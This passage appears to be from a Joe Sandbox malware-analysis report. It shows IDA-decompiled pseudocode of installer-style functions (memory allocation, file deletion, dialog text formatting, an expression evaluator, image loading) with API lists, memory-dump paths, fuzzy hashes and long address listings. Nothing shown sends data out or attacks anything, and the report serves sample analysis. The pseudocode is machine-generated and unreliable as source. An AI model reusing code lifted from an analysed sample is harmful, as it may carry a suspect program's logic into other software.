                                                                                                                                                                                                                            					DeleteFileW( *(_t61 - 0x40));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t56);
                                                                                                                                                                                                                            				E00401423();
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00402A06
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00402A19
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                                                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                                                                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				char _v132;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t23 = _a16;
                                                                                                                                                                                                                            				_t53 = _a12;
                                                                                                                                                                                                                            				_t44 = 0xffffffdc;
                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                            					_push(0x14);
                                                                                                                                                                                                                            					_pop(0);
                                                                                                                                                                                                                            					_t24 = _t53;
                                                                                                                                                                                                                            					if(_t53 < 0x100000) {
                                                                                                                                                                                                                            						_push(0xa);
                                                                                                                                                                                                                            						_pop(0);
                                                                                                                                                                                                                            						_t44 = 0xffffffdd;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t53 < 0x400) {
                                                                                                                                                                                                                            						_t44 = 0xffffffde;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t53 < 0xffff3333) {
                                                                                                                                                                                                                            						_t52 = 0x14;
                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                            						_t24 = 1 / _t52 + _t53;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t25 = _t24 & 0x00ffffff;
                                                                                                                                                                                                                            					_t55 = _t24 >> 0;
                                                                                                                                                                                                                            					_t46 = 0xa;
                                                                                                                                                                                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                                                                                                                            					_t50 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                                                                                                                            				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                                                                                                                            				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                                                                                                                                                                            				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                                                                                                                            				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404F1B
                                                                                                                                                                                                                            • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                            • String ID: %u.%u%s%s$H7B
                                                                                                                                                                                                                            • API String ID: 3540041739-107966168
                                                                                                                                                                                                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                                                                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                                                                            			E687E1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				void _t45;
                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                                                                            				void* _t101;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t85 = __edx;
                                                                                                                                                                                                                            				 *0x687e506c = _a8;
                                                                                                                                                                                                                            				_t77 = 0;
                                                                                                                                                                                                                            				 *0x687e5070 = _a16;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = E687E12E3();
                                                                                                                                                                                                                            				_t90 = E687E13B1(_t42);
                                                                                                                                                                                                                            				_t87 = _t85;
                                                                                                                                                                                                                            				_t81 = E687E12E3();
                                                                                                                                                                                                                            				_a8 = _t81;
                                                                                                                                                                                                                            				_t45 =  *_t81;
                                                                                                                                                                                                                            				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                                                                                                                                                                            					_a16 = E687E12E3();
                                                                                                                                                                                                                            					_t77 = E687E13B1(_t74);
                                                                                                                                                                                                                            					_v12 = _t85;
                                                                                                                                                                                                                            					GlobalFree(_a16);
                                                                                                                                                                                                                            					_t81 = _a8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t46 =  *_t81 & 0x0000ffff;
                                                                                                                                                                                                                            				_t101 = _t46 - 0x2f;
                                                                                                                                                                                                                            				if(_t101 > 0) {
                                                                                                                                                                                                                            					_t47 = _t46 - 0x3c;
                                                                                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                                                                                            					if(_t47 == 0) {
                                                                                                                                                                                                                            						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                                                                                                                                                                                            						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                                                                                                                                                                                            							__eflags = _t87 - _v12;
                                                                                                                                                                                                                            							if(__eflags > 0) {
                                                                                                                                                                                                                            								L56:
                                                                                                                                                                                                                            								_t48 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								L57:
                                                                                                                                                                                                                            								asm("cdq");
                                                                                                                                                                                                                            								L58:
                                                                                                                                                                                                                            								_t90 = _t48;
                                                                                                                                                                                                                            								_t87 = _t85;
                                                                                                                                                                                                                            								L59:
                                                                                                                                                                                                                            								E687E1510(_t85, _t90, _t87,  &_v76);
                                                                                                                                                                                                                            								E687E1312( &_v76);
                                                                                                                                                                                                                            								GlobalFree(_v8);
                                                                                                                                                                                                                            								return GlobalFree(_a8);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(__eflags < 0) {
                                                                                                                                                                                                                            								L49:
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								L50:
                                                                                                                                                                                                                            								_t48 = 1;
                                                                                                                                                                                                                            								goto L57;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t90 - _t77;
                                                                                                                                                                                                                            							if(_t90 < _t77) {
                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L56;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t85 = _t87;
                                                                                                                                                                                                                            						_t48 = E687E3050(_t90, _t77, _t85);
                                                                                                                                                                                                                            						goto L58;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t57 = _t47 - 1;
                                                                                                                                                                                                                            					__eflags = _t57;
                                                                                                                                                                                                                            					if(_t57 == 0) {
                                                                                                                                                                                                                            						__eflags = _t90 - _t77;
                                                                                                                                                                                                                            						if(_t90 != _t77) {
                                                                                                                                                                                                                            							goto L56;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t87 - _v12;
                                                                                                                                                                                                                            						if(_t87 != _v12) {
                                                                                                                                                                                                                            							goto L56;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L49;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t58 = _t57 - 1;
                                                                                                                                                                                                                            					__eflags = _t58;
                                                                                                                                                                                                                            					if(_t58 == 0) {
                                                                                                                                                                                                                            						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                                                                                                                                                                                            						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                                                                                                                                                                                            							__eflags = _t87 - _v12;
                                                                                                                                                                                                                            							if(__eflags < 0) {
                                                                                                                                                                                                                            								goto L56;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(__eflags > 0) {
                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t90 - _t77;
                                                                                                                                                                                                                            							if(_t90 <= _t77) {
                                                                                                                                                                                                                            								goto L56;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                                                                                                                                                                                            						_t85 = _t87;
                                                                                                                                                                                                                            						_t59 = _t90;
                                                                                                                                                                                                                            						_t83 = _t77;
                                                                                                                                                                                                                            						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                                                                                                                                                                                            							_t48 = E687E3070(_t59, _t83, _t85);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t48 = E687E30A0(_t59, _t83, _t85);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L58;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t60 = _t58 - 0x20;
                                                                                                                                                                                                                            					__eflags = _t60;
                                                                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                                                                            						_t90 = _t90 ^ _t77;
                                                                                                                                                                                                                            						_t87 = _t87 ^ _v12;
                                                                                                                                                                                                                            						goto L59;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t61 = _t60 - 0x1e;
                                                                                                                                                                                                                            					__eflags = _t61;
                                                                                                                                                                                                                            					if(_t61 == 0) {
                                                                                                                                                                                                                            						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                                                                                                                                                                                            						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                                                                                                                                                                                            							_t90 = _t90 | _t77;
                                                                                                                                                                                                                            							_t87 = _t87 | _v12;
                                                                                                                                                                                                                            							goto L59;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t90 | _t87;
                                                                                                                                                                                                                            						if((_t90 | _t87) != 0) {
                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t77 | _v12;
                                                                                                                                                                                                                            						if((_t77 | _v12) != 0) {
                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L56;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t61 == 0;
                                                                                                                                                                                                                            					if(_t61 == 0) {
                                                                                                                                                                                                                            						_t90 =  !_t90;
                                                                                                                                                                                                                            						_t87 =  !_t87;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L59;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t101 == 0) {
                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                            					__eflags = _t77 | _v12;
                                                                                                                                                                                                                            					if((_t77 | _v12) != 0) {
                                                                                                                                                                                                                            						_v24 = E687E2EE0(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                                            						_v20 = _t85;
                                                                                                                                                                                                                            						_t48 = E687E2F90(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                                            						_t81 = _a8;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                            						_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                            						_t48 = _t90;
                                                                                                                                                                                                                            						_t85 = _t87;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *_t81 - 0x2f;
                                                                                                                                                                                                                            					if( *_t81 != 0x2f) {
                                                                                                                                                                                                                            						goto L58;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t90 = _v24;
                                                                                                                                                                                                                            						_t87 = _v20;
                                                                                                                                                                                                                            						goto L59;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t67 = _t46 - 0x21;
                                                                                                                                                                                                                            				if(_t67 == 0) {
                                                                                                                                                                                                                            					_t48 = 0;
                                                                                                                                                                                                                            					__eflags = _t90 | _t87;
                                                                                                                                                                                                                            					if((_t90 | _t87) != 0) {
                                                                                                                                                                                                                            						goto L57;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L50;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t68 = _t67 - 4;
                                                                                                                                                                                                                            				if(_t68 == 0) {
                                                                                                                                                                                                                            					goto L21;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t69 = _t68 - 1;
                                                                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                                                                            					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                                                                                                                                                                                            					if( *((short*)(_t81 + 2)) != 0x26) {
                                                                                                                                                                                                                            						_t90 = _t90 & _t77;
                                                                                                                                                                                                                            						_t87 = _t87 & _v12;
                                                                                                                                                                                                                            						goto L59;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t90 | _t87;
                                                                                                                                                                                                                            					if((_t90 | _t87) == 0) {
                                                                                                                                                                                                                            						goto L56;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t77 | _v12;
                                                                                                                                                                                                                            					if((_t77 | _v12) == 0) {
                                                                                                                                                                                                                            						goto L56;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L49;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t70 = _t69 - 4;
                                                                                                                                                                                                                            				if(_t70 == 0) {
                                                                                                                                                                                                                            					_t48 = E687E2EA0(_t90, _t87, _t77, _v12);
                                                                                                                                                                                                                            					goto L58;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t71 = _t70 - 1;
                                                                                                                                                                                                                            					if(_t71 == 0) {
                                                                                                                                                                                                                            						_t90 = _t90 + _t77;
                                                                                                                                                                                                                            						asm("adc edi, [ebp-0x8]");
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(_t71 == 0) {
                                                                                                                                                                                                                            							_t90 = _t90 - _t77;
                                                                                                                                                                                                                            							asm("sbb edi, [ebp-0x8]");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L59;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b53
                                                                                                                                                                                                                            0x687e1b55
                                                                                                                                                                                                                            0x687e1b55
                                                                                                                                                                                                                            0x687e1b56
                                                                                                                                                                                                                            0x687e1b56
                                                                                                                                                                                                                            0x687e1b58
                                                                                                                                                                                                                            0x687e1b5a
                                                                                                                                                                                                                            0x687e1b60
                                                                                                                                                                                                                            0x687e1b69
                                                                                                                                                                                                                            0x687e1b7a
                                                                                                                                                                                                                            0x687e1b85
                                                                                                                                                                                                                            0x687e1b85
                                                                                                                                                                                                                            0x687e1b4d
                                                                                                                                                                                                                            0x687e1b2f
                                                                                                                                                                                                                            0x687e1b2f
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b31
                                                                                                                                                                                                                            0x687e1b4f
                                                                                                                                                                                                                            0x687e1b51
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b51
                                                                                                                                                                                                                            0x687e1b3d
                                                                                                                                                                                                                            0x687e1b41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b41
                                                                                                                                                                                                                            0x687e1ab6
                                                                                                                                                                                                                            0x687e1ab6
                                                                                                                                                                                                                            0x687e1ab7
                                                                                                                                                                                                                            0x687e1b26
                                                                                                                                                                                                                            0x687e1b28
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b2a
                                                                                                                                                                                                                            0x687e1b2d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b2d
                                                                                                                                                                                                                            0x687e1ab9
                                                                                                                                                                                                                            0x687e1ab9
                                                                                                                                                                                                                            0x687e1aba
                                                                                                                                                                                                                            0x687e1af7
                                                                                                                                                                                                                            0x687e1afc
                                                                                                                                                                                                                            0x687e1b19
                                                                                                                                                                                                                            0x687e1b1c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b1e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b20
                                                                                                                                                                                                                            0x687e1b22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b24
                                                                                                                                                                                                                            0x687e1afe
                                                                                                                                                                                                                            0x687e1b03
                                                                                                                                                                                                                            0x687e1b05
                                                                                                                                                                                                                            0x687e1b07
                                                                                                                                                                                                                            0x687e1b09
                                                                                                                                                                                                                            0x687e1b12
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x687e1b0b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1b09
                                                                                                                                                                                                                            0x687e1abc
                                                                                                                                                                                                                            0x687e1abc
                                                                                                                                                                                                                            0x687e1abf
                                                                                                                                                                                                                            0x687e1af0
                                                                                                                                                                                                                            0x687e1af2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1af2
                                                                                                                                                                                                                            0x687e1ac1
                                                                                                                                                                                                                            0x687e1ac1
                                                                                                                                                                                                                            0x687e1ac4
                                                                                                                                                                                                                            0x687e1ad7
                                                                                                                                                                                                                            0x687e1adc
                                                                                                                                                                                                                            0x687e1ae9
                                                                                                                                                                                                                            0x687e1aeb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1aeb
                                                                                                                                                                                                                            0x687e1ade
                                                                                                                                                                                                                            0x687e1ae0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ae2
                                                                                                                                                                                                                            0x687e1ae5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ae7
                                                                                                                                                                                                                            0x687e1ac7
                                                                                                                                                                                                                            0x687e1ac8
                                                                                                                                                                                                                            0x687e1ace
                                                                                                                                                                                                                            0x687e1ad0
                                                                                                                                                                                                                            0x687e1ad0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ac8
                                                                                                                                                                                                                            0x687e19ef
                                                                                                                                                                                                                            0x687e1a68
                                                                                                                                                                                                                            0x687e1a6a
                                                                                                                                                                                                                            0x687e1a6d
                                                                                                                                                                                                                            0x687e1a8b
                                                                                                                                                                                                                            0x687e1a8e
                                                                                                                                                                                                                            0x687e1a94
                                                                                                                                                                                                                            0x687e1a99
                                                                                                                                                                                                                            0x687e1a6f
                                                                                                                                                                                                                            0x687e1a6f
                                                                                                                                                                                                                            0x687e1a73
                                                                                                                                                                                                                            0x687e1a77
                                                                                                                                                                                                                            0x687e1a79
                                                                                                                                                                                                                            0x687e1a79
                                                                                                                                                                                                                            0x687e1a9c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                            • Opcode ID: 3e2625d302410a43f8f232d0d6b254f0c83f3de2b481c7e7a5cd689b4b7dc063
                                                                                                                                                                                                                            • Instruction ID: 0f43ad9ab5d922abc06eda50201b913675f1190cdb396e72b726d13e4fd9a517
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e2625d302410a43f8f232d0d6b254f0c83f3de2b481c7e7a5cd689b4b7dc063
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E51A436D04118EA8B109FA8C75E5BD76BEEB4531FFC181B9F424A3210E771AE8587B1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00401D81(void* __ebx, void* __edx) {
                                                                                                                                                                                                                            				struct HWND__* _t30;
                                                                                                                                                                                                                            				WCHAR* _t38;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                            				long _t63;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t53 = __ebx;
                                                                                                                                                                                                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                                                                                                                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00402D84(2);
                                                                                                                                                                                                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t55 =  *(_t65 - 0x24);
                                                                                                                                                                                                                            				 *(_t65 + 8) = _t30;
                                                                                                                                                                                                                            				_t60 = _t55 & 0x00000004;
                                                                                                                                                                                                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                                                                                                                                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                                                                                                                                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                                                                                                                            				if((_t55 & 0x00010000) == 0) {
                                                                                                                                                                                                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t38 = E00402DA6(0x11);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *(_t65 - 0x44) = _t38;
                                                                                                                                                                                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                                                                                                                                                            				asm("sbb esi, esi");
                                                                                                                                                                                                                            				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
